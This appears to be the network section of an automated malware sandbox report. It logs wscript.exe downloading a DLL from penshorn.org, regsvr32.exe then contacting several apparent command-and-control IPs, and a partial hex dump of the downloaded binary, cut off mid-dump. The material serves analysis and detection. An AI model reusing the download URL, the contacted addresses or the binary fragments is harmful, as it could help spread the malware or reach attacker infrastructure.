Mar 17, 2023 09:12:45.141813993 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:45.141899109 CET	49708	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:12:45.143255949 CET	49708	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:12:45.143280983 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:45.887183905 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:45.887409925 CET	49708	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:12:45.890615940 CET	49708	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:12:45.890710115 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:45.891325951 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:45.892709970 CET	49708	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:12:45.892760038 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:47.050761938 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:47.050905943 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:47.051105976 CET	49708	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:12:47.052181959 CET	49708	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:12:47.052227974 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:47.052278996 CET	49708	443	192.168.2.7	182.162.143.56
Mar 17, 2023 09:12:47.052294016 CET	443	49708	182.162.143.56	192.168.2.7
Mar 17, 2023 09:12:51.142659903 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:51.372376919 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:51.374737978 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:51.376300097 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:51.605756998 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:51.621128082 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:51.621155977 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:51.621252060 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:51.623828888 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:51.853929043 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:51.855115891 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:52.123851061 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:53.144655943 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:53.199357033 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:56.144053936 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:56.144063950 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:56.144181967 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:56.144891977 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:56.144947052 CET	49709	80	192.168.2.7	187.63.160.88
Mar 17, 2023 09:12:56.374315977 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:56.374351025 CET	80	49709	187.63.160.88	192.168.2.7
Mar 17, 2023 09:12:57.142530918 CET	49710	8080	192.168.2.7	167.172.199.165
Mar 17, 2023 09:12:57.310009956 CET	8080	49710	167.172.199.165	192.168.2.7
Mar 17, 2023 09:12:57.824762106 CET	49710	8080	192.168.2.7	167.172.199.165
Mar 17, 2023 09:12:57.991993904 CET	8080	49710	167.172.199.165	192.168.2.7
Mar 17, 2023 09:12:58.496745110 CET	49710	8080	192.168.2.7	167.172.199.165
Mar 17, 2023 09:12:58.663834095 CET	8080	49710	167.172.199.165	192.168.2.7
Mar 17, 2023 09:13:04.148561001 CET	49711	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.148636103 CET	443	49711	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.148880959 CET	49711	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.149904013 CET	49711	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.149923086 CET	443	49711	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.184581995 CET	443	49711	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.186717033 CET	49712	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.186759949 CET	443	49712	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.186949015 CET	49712	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.188292980 CET	49712	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.188318968 CET	443	49712	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.220016956 CET	443	49712	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.220843077 CET	49713	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.220899105 CET	443	49713	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.221013069 CET	49713	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.221570015 CET	49713	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.221586943 CET	443	49713	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.253700972 CET	443	49713	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.254853964 CET	49714	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.254928112 CET	443	49714	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.255038023 CET	49714	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.255819082 CET	49714	443	192.168.2.7	164.90.222.65
Mar 17, 2023 09:13:04.255845070 CET	443	49714	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:04.287348986 CET	443	49714	164.90.222.65	192.168.2.7
Mar 17, 2023 09:13:09.645395041 CET	49715	8080	192.168.2.7	104.168.155.143
Mar 17, 2023 09:13:09.812134981 CET	8080	49715	104.168.155.143	192.168.2.7
Mar 17, 2023 09:13:10.325756073 CET	49715	8080	192.168.2.7	104.168.155.143
Mar 17, 2023 09:13:10.493499041 CET	8080	49715	104.168.155.143	192.168.2.7
Mar 17, 2023 09:13:10.997728109 CET	49715	8080	192.168.2.7	104.168.155.143
Mar 17, 2023 09:13:11.164537907 CET	8080	49715	104.168.155.143	192.168.2.7
Mar 17, 2023 09:13:16.647617102 CET	49716	8080	192.168.2.7	163.44.196.120
Mar 17, 2023 09:13:16.852474928 CET	8080	49716	163.44.196.120	192.168.2.7
Mar 17, 2023 09:13:17.357636929 CET	49716	8080	192.168.2.7	163.44.196.120
Mar 17, 2023 09:13:17.562427998 CET	8080	49716	163.44.196.120	192.168.2.7
Mar 17, 2023 09:13:18.076545954 CET	49716	8080	192.168.2.7	163.44.196.120
Mar 17, 2023 09:13:18.282208920 CET	8080	49716	163.44.196.120	192.168.2.7
Mar 17, 2023 09:13:23.900008917 CET	49717	8080	192.168.2.7	160.16.142.56
Mar 17, 2023 09:13:26.905333042 CET	49717	8080	192.168.2.7	160.16.142.56
Mar 17, 2023 09:13:32.905869961 CET	49717	8080	192.168.2.7	160.16.142.56
Mar 17, 2023 09:13:42.898819923 CET	49718	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:42.898874998 CET	443	49718	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:42.898977995 CET	49718	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:42.899749994 CET	49718	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:42.899774075 CET	443	49718	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.196980000 CET	443	49718	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.198013067 CET	49719	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.198076010 CET	443	49719	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.198195934 CET	49719	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.199003935 CET	49719	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.199038982 CET	443	49719	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.495934010 CET	443	49719	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.498505116 CET	49720	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.498599052 CET	443	49720	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.498703003 CET	49720	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.499552965 CET	49720	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.499591112 CET	443	49720	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.766035080 CET	443	49720	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.769764900 CET	49721	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.769823074 CET	443	49721	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:43.769927979 CET	49721	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.770704985 CET	49721	443	192.168.2.7	159.89.202.34
Mar 17, 2023 09:13:43.770723104 CET	443	49721	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:44.059360027 CET	443	49721	159.89.202.34	192.168.2.7
Mar 17, 2023 09:13:49.403013945 CET	49722	8080	192.168.2.7	159.65.88.10
Mar 17, 2023 09:13:49.434348106 CET	8080	49722	159.65.88.10	192.168.2.7
Mar 17, 2023 09:13:49.943079948 CET	49722	8080	192.168.2.7	159.65.88.10
Mar 17, 2023 09:13:49.974268913 CET	8080	49722	159.65.88.10	192.168.2.7
Mar 17, 2023 09:13:50.475919008 CET	49722	8080	192.168.2.7	159.65.88.10
Mar 17, 2023 09:13:50.513086081 CET	8080	49722	159.65.88.10	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2023 09:11:49.227663040 CET	50330	53	192.168.2.7	8.8.8.8
Mar 17, 2023 09:11:49.539346933 CET	53	50330	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 17, 2023 09:11:49.227663040 CET	192.168.2.7	8.8.8.8	0x4c70	Standard query (0)	penshorn.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 17, 2023 09:11:49.539346933 CET	8.8.8.8	192.168.2.7	0x4c70	No error (0)	penshorn.org		203.26.41.131	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

penshorn.org

182.162.143.56

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49702	203.26.41.131	443	C:\Windows\SysWOW64\wscript.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49708	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49709	187.63.160.88	80	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Mar 17, 2023 09:12:51.376300097 CET	787	OUT	Data Raw: 16 03 03 00 97 01 00 00 93 03 03 64 14 91 82 f3 64 3b d5 09 10 f5 e5 37 a0 1f d5 ff c1 db 30 65 4e 20 b2 15 86 51 00 09 7f d4 2c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: dd;70eN Q,*,+0/$#('=<5/@#
Mar 17, 2023 09:12:51.621128082 CET	788	IN	Data Raw: 16 03 03 00 41 02 00 00 3d 03 03 4c fe f0 9f 0f 64 e7 6c e7 d0 db 09 d4 d9 47 72 f5 1f 13 11 19 70 3a ae 10 54 85 d1 4a 2f 85 cf 00 c0 30 00 00 15 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 23 00 00 00 17 00 00 16 03 03 03 cf 0b 00 03 cb 00 03 c8 Data Ascii: A=LdlGrp:TJ/0#00* aH0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT Department10Uexample.c
Mar 17, 2023 09:12:51.621155977 CET	788	IN	Data Raw: 9c b2 32 fe 65 1c 04 f9 8c ea 00 82 ad 17 94 91 fb fe cf 0a be 5b 23 c5 a8 b7 38 af 7e 87 cd c2 77 02 33 0f 38 5e 85 14 d4 f5 24 9c 40 f8 b3 d5 33 f6 70 31 ad 36 26 50 54 08 67 71 32 08 bd 8a ee 3e 8a 53 73 16 03 03 00 04 0e 00 00 00 Data Ascii: 2e[#8~w38^$@3p16&PTgq2>Ss
Mar 17, 2023 09:12:51.623828888 CET	788	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 93 a4 1c 59 34 c6 9e 86 0b 0a 8b 48 b8 4f 07 46 ec 70 9b b8 83 77 97 09 3a 1d 8b 32 23 92 93 49 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 f4 14 29 26 b9 cb b3 0b 38 9b 8a 28 64 1e df dd 42 b1 5b ca 33 Data Ascii: %! Y4HOFpw:2#I()&8(dB[3dLE3
Mar 17, 2023 09:12:51.853929043 CET	788	IN	Data Raw: 16 03 03 00 ba 04 00 00 b6 00 00 01 2c 00 b0 41 31 a7 4e 61 dc 74 8b 8a 90 c0 42 d1 49 f2 c2 bd a8 d0 fc 7c 6f 1b cd 19 e2 3b 01 09 4e 56 a5 71 d4 1c 4d 5d bd 82 a0 ef 19 1b 06 eb da 00 e9 97 91 76 89 16 6c ca 58 30 47 8a 1b c2 be fc dc 7d bd f0 Data Ascii: ,A1NatBI\|o;NVqM]vlX0G}A(Z1}8\|v5U8}LO'e}9Ca>[m,c5c2{m^f:Ll=o`(x\Z$~z~3a`3T<h(
Mar 17, 2023 09:12:51.855115891 CET	789	OUT	Data Raw: 17 03 03 00 92 00 00 00 00 00 00 00 01 67 f5 d7 fd 35 05 12 19 57 6a 53 13 ec f8 ad dc 18 28 b1 51 13 ab 0c 2c 16 89 06 69 91 7b 6c 37 3b a8 ca b3 b1 b4 2e cc f0 6a cf 32 34 23 83 60 14 3b f8 7a e0 ef 5e 01 ec c1 29 ca 91 fe f4 e2 31 f1 74 e9 cf Data Ascii: g5WjS(Q,i{l7;.j24#`;z^)1t=ZYqiH-#DGJq%qVO%Ql^BA*3n6
Mar 17, 2023 09:12:53.144655943 CET	789	IN	Data Raw: 17 03 03 01 3e 78 5c 5a 2a 24 7e 15 aa 0f 5e 68 0e ee 8d 2d 02 c0 ec 3e cf 90 01 35 ae bd c3 c3 ee 67 0f 2e 96 9b 99 7e 7e 48 73 1b 61 0d 19 b2 8f 17 06 d7 5d 27 b9 e9 fc 3e 17 e6 8e 67 44 d5 2c 50 a8 c5 b2 14 98 f2 f7 4c 73 4f 41 84 a7 47 5c dd Data Ascii: >x\Z*$~^h->5g.~~Hsa]'>gD,PLsOAG\clY\|/tD95k@b7$v]@`S^ScAc?gyuC.!Lf$$"5!aHMuxAIpnP<K
Mar 17, 2023 09:12:56.144053936 CET	789	IN	Data Raw: 15 03 03 00 1a 78 5c 5a 2a 24 7e 15 ab 59 ae 6f c6 e8 ce c9 b6 d2 bd 36 91 53 2d f8 61 b7 af Data Ascii: x\Z*$~Yo6S-a
Mar 17, 2023 09:12:56.144891977 CET	789	OUT	Data Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 02 33 ac 50 39 73 5b dc a9 d7 3d f3 7a ee 0b ce 10 58 c4 Data Ascii: 3P9s[=zX

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49702	203.26.41.131	443	C:\Windows\SysWOW64\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-17 08:11:50 UTC	0	OUT	GET /admin/Ses8712iGR8du/ HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: penshorn.org
2023-03-17 08:11:50 UTC	0	IN	HTTP/1.1 200 OK Date: Fri, 17 Mar 2023 08:11:50 GMT Server: Apache X-Powered-By: PHP/7.0.33 Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 17 Mar 2023 08:11:50 GMT Content-Disposition: attachment; filename="QStvR8Jwnikk52.dll" Content-Transfer-Encoding: binary Set-Cookie: 641420c68cf1e=1679040710; expires=Fri, 17-Mar-2023 08:12:50 GMT; Max-Age=60; path=/ Last-Modified: Fri, 17 Mar 2023 08:11:50 GMT Connection: close Transfer-Encoding: chunked Content-Type: application/x-msdownload
2023-03-17 08:11:50 UTC	0	IN	Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52 Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
2023-03-17 08:11:50 UTC	8	IN	Data Raw: 44 09 c0 f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 48 8b e9 4d 8b f9 49 8b c8 49 8b f0 4c 8b ea e8 d0 1a 00 00 4d 8b 67 08 4d 8b 37 49 8b 5f 38 4d 2b f4 f6 45 04 66 41 8b 7f 48 0f 85 dc 00 00 00 48 89 6c 24 30 48 89 74 24 38 3b 3b 0f 83 76 01 00 00 8b f7 48 03 f6 8b 44 f3 Data Ascii: DBDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$WATAUAVAWH@HMIILMgM7I_8M+EfAHHl$0Ht$8;;vHD
2023-03-17 08:11:50 UTC	16	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:50 UTC	16	IN	Data Raw: 34 30 30 30 0d 0a 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 48 3b d1 73 0e 4e 8d 0c 02 49 3b c9 0f 82 41 04 00 00 90 83 3d 91 c3 01 00 03 0f 82 e3 02 00 00 49 81 f8 00 20 00 00 76 16 49 81 f8 00 00 18 00 77 0d f6 05 ea d3 01 00 02 0f 85 64 fe ff ff c5 fe 6f 02 c4 a1 7e 6f 6c 02 e0 49 81 f8 00 01 00 00 0f 86 c4 00 00 00 4c 8b c9 49 83 e1 1f 49 83 e9 20 49 2b c9 49 2b d1 4d 03 c1 49 81 f8 00 01 00 00 0f 86 a3 00 00 00 49 81 f8 00 00 18 00 0f 87 3e 01 00 00 66 66 66 66 66 66 0f Data Ascii: 4000fHLJLHLJLHDBfD@DBD@HHI woBoTBTH;sNI;A=I vIwdo~olILII I+I+MII>ffffff
2023-03-17 08:11:50 UTC	24	IN	Data Raw: 48 83 ec 20 48 8b 1d 0b a4 01 00 48 8b cb e8 3b 18 00 00 48 8b cb e8 db 3f 00 00 48 8b cb e8 cb 40 00 00 48 8b cb e8 7f 43 00 00 48 8b cb e8 4b f5 ff ff b0 01 48 83 c4 20 5b c3 cc cc cc 33 c9 e9 19 be ff ff cc 40 53 48 83 ec 20 48 8b 0d b3 b9 01 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1f 48 8b 0d a0 b9 01 00 48 8d 1d f9 a3 01 00 48 3b cb 74 0c e8 1b 1b 00 00 48 89 1d 88 b9 01 00 b0 01 48 83 c4 20 5b c3 48 83 ec 28 48 8b 0d b5 bf 01 00 e8 fc 1a 00 00 48 8b 0d b1 bf 01 00 48 83 25 a1 bf 01 00 00 e8 e8 1a 00 00 48 8b 0d 75 b9 01 00 48 83 25 95 bf 01 00 00 e8 d4 1a 00 00 48 8b 0d 69 b9 01 00 48 83 25 59 b9 01 00 00 e8 c0 1a 00 00 48 83 25 54 b9 01 00 00 b0 01 48 83 c4 28 c3 cc 48 8d 15 fd 0b 01 00 48 8d 0d f6 0a 01 00 e9 25 3e 00 00 cc 48 83 ec 28 e8 37 12 00 00 Data Ascii: H HH;H?H@HCHKH [3@SH HuHHH;tHH [H(HHH%HuH%HiH%YH%TH(HH%>H(7
2023-03-17 08:11:50 UTC	32	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	32	IN	Data Raw: 34 30 30 30 0d 0a 4c 8b 00 49 8b cc 48 ff c1 45 38 3c 08 75 f7 48 ff c2 48 83 c0 08 48 03 d1 48 3b c6 75 e2 48 89 55 50 41 b8 01 00 00 00 49 8b ce e8 3c d7 ff ff 48 8b d8 48 85 c0 75 32 33 c9 e8 4d fb ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 3d fb ff ff 48 83 c3 08 48 3b de 75 ef 41 8b f4 48 8b cf e8 29 fb ff ff 8b c6 e9 8d 00 00 00 4a 8d 0c f0 4c 8b f7 48 89 4d 58 4c 8b e1 48 3b fe 74 4c 48 2b c7 48 89 45 48 4d 8b 06 49 83 cf ff 49 ff c7 43 80 3c 38 00 75 f6 48 8b d1 49 ff c7 49 2b d4 4d 8b cf 48 03 55 50 49 8b cc e8 03 38 00 00 85 c0 75 5e 48 8b 45 48 48 8b 4d 58 4e 89 24 30 4d 03 e7 49 83 c6 08 4c 3b f6 75 bb 33 c9 49 89 5d 00 e8 b8 fa ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 a8 fa ff ff 48 83 c3 08 48 3b de 75 ef 48 8b cf e8 97 fa ff ff 33 c0 48 8b Data Ascii: 4000LIHE8<uHHHH;uHUPAI<HHu23MHH;tH=HH;uAH)JLHMXLH;tLH+HEHMIIC<8uHII+MHUPI8u^HEHHMXN$0MIL;u3I]HH;tHHH;uH3H
2023-03-17 08:11:51 UTC	40	IN	Data Raw: 5c 24 08 57 48 83 ec 20 48 8b f9 e8 2e 00 00 00 33 db 48 85 c0 74 1a 49 ba 70 20 d3 1c df 0f ed d1 48 8b cf ff 15 54 b7 00 00 85 c0 0f 95 c3 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 33 c9 e8 1b d5 ff ff 90 48 8b 05 c3 63 01 00 8b c8 83 e1 3f 48 8b 1d 9f 7f 01 00 48 33 d8 48 d3 cb 33 c9 e8 4e d5 ff ff 48 8b c3 48 83 c4 20 5b c3 cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 8b 0a e8 d7 d4 ff ff 90 48 8b 05 7f 63 01 00 8b c8 83 e1 3f 48 8b 1d 73 7f 01 00 48 33 d8 48 d3 cb 8b 0f e8 0a d5 ff ff 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 8b dc 48 83 ec 28 b8 03 00 00 00 4d 8d 4b 10 4d 8d 43 08 89 44 24 38 49 8d 53 18 89 44 24 40 49 8d 4b 08 e8 8f ff ff ff 48 83 c4 28 c3 cc cc 48 89 0d 11 7f 01 00 48 89 0d 12 7f 01 00 48 89 0d Data Ascii: \$WH H.3HtIp HTH\$0H _@SH 3Hc?HH3H3NHH [H\$LL$ WH IHc?HsH3HHH\$0H _LH(MKMCD$8ISD$@IKH(HHH
2023-03-17 08:11:51 UTC	48	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	48	IN	Data Raw: 34 30 30 30 0d 0a 48 8b 45 08 83 a0 a8 03 00 00 fd 8b c7 48 8b 4d 28 48 33 cd e8 97 44 ff ff 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 50 48 89 5d 40 48 89 75 48 48 89 7d 50 48 8b 05 b6 43 01 00 48 33 c5 48 89 45 08 48 63 7d 60 49 8b f1 45 8b e0 4c 8b ea 48 8b d9 85 ff 7e 14 48 8b d7 49 8b c9 e8 c0 1b 00 00 3b c7 8d 78 01 7c 02 8b f8 44 8b 75 78 45 85 f6 75 07 48 8b 03 44 8b 70 0c f7 9d 80 00 00 00 44 8b cf 4c 8b c6 41 8b ce 1b d2 83 64 24 28 00 48 83 64 24 20 00 83 e2 08 ff c2 e8 05 d4 ff ff 33 d2 4c 63 f8 85 c0 0f 84 73 02 00 00 49 8b c7 48 03 c0 48 8d 48 10 48 3b c1 48 1b c0 48 23 c1 0f 84 3d 02 00 00 49 b8 f0 ff ff ff ff ff ff 0f 48 3d 00 04 00 00 77 31 48 8d Data Ascii: 4000HEHM(H3DH]`HuhH}pHe0A_A^A]A\]@UATAUAVAWH`Hl$PH]@HuHH}PHCH3HEHc}`IELH~HI;x\|DuxEuHDpDLAd$(Hd$ 3LcsIHHHH;HH#=IH=w1H
2023-03-17 08:11:51 UTC	56	IN	Data Raw: e1 49 03 c1 66 48 0f 6e c8 66 0f 2f 25 75 da 00 00 0f 82 df 00 00 00 48 c1 e8 2c 66 0f eb 15 c3 d9 00 00 66 0f eb 0d bb d9 00 00 4c 8d 0d 34 eb 00 00 f2 0f 5c ca f2 41 0f 59 0c c1 66 0f 28 d1 66 0f 28 c1 4c 8d 0d fb da 00 00 f2 0f 10 1d 03 da 00 00 f2 0f 10 0d cb d9 00 00 f2 0f 59 da f2 0f 59 ca f2 0f 59 c2 66 0f 28 e0 f2 0f 58 1d d3 d9 00 00 f2 0f 58 0d 9b d9 00 00 f2 0f 59 e0 f2 0f 59 da f2 0f 59 c8 f2 0f 58 1d a7 d9 00 00 f2 0f 58 ca f2 0f 59 dc f2 0f 58 cb f2 0f 10 2d 13 d9 00 00 f2 0f 59 0d cb d8 00 00 f2 0f 59 ee f2 0f 5c e9 f2 41 0f 10 04 c1 48 8d 15 96 e2 00 00 f2 0f 10 14 c2 f2 0f 10 25 d9 d8 00 00 f2 0f 59 e6 f2 0f 58 c4 f2 0f 58 d5 f2 0f 58 c2 66 0f 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 f2 0f 10 15 c8 d8 00 00 f2 Data Ascii: IfHnf/%uH,ffL4\AYf(f(LYYYf(XXYYYXXYX-YY\AH%YXXXfot$ HXffffff
2023-03-17 08:11:51 UTC	64	IN	Data Raw: 0d 0a Data Ascii:
2023-03-17 08:11:51 UTC	64	IN	Data Raw: 34 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 81 ec 58 03 00 00 48 8b 05 e9 03 01 00 48 33 c4 48 89 84 24 40 03 00 00 48 c7 44 24 48 00 00 00 00 48 8d 05 46 d3 00 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 b8 08 00 00 00 48 6b c0 00 48 8d 0d 35 d3 00 00 48 89 8c 04 80 00 00 00 48 63 84 24 60 03 00 00 b9 08 00 00 00 48 6b c9 01 48 89 84 0c 80 00 00 00 b8 08 00 00 00 48 6b c0 02 48 c7 84 04 80 00 00 00 09 04 00 00 4c 8d 4c 24 58 41 b8 03 00 00 00 48 8d 94 24 80 00 00 00 48 8d 0d 35 f3 fe ff ff 15 4f 56 00 00 89 44 24 34 4c 8d 4c 24 40 4c 8d 44 24 